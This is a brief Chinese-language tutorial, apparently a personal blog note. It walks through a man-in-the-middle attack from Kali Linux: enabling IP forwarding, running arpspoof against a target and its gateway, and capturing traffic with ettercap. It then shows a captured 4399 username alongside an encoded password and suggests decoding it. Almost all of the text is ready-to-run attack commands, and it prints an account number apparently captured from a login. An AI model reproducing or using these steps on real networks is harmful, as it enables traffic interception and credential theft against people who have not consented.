需要知道目标IP,目标网关,本机网卡,本机IP
打开kali终端输入命令:
echo1 >/proc/sys/net/ipv4/ip_forward
使目标不断网
cat /proc/sys/net/ipv4/ip_forward
检查上述命令是否被执行,若返回1则说明已被执行
arpspoof -i 本机网卡 -t 目标IP目标网关
在本列中命令为:
arpspoof -i eth0 -t 192.168.0.120 192.168.0.1
另一个终端用来接收劫持(盗取的信息)
输入ettercap -Tq -i eth0
在被劫持目标上虽已登陆一个网站可发现用户名及密码已被劫持(我登陆的4399)
可以看到账号为2634157460而密码是一串编码这是因为网站对密码的加密缘故,可以通过解密手段对编码进行解码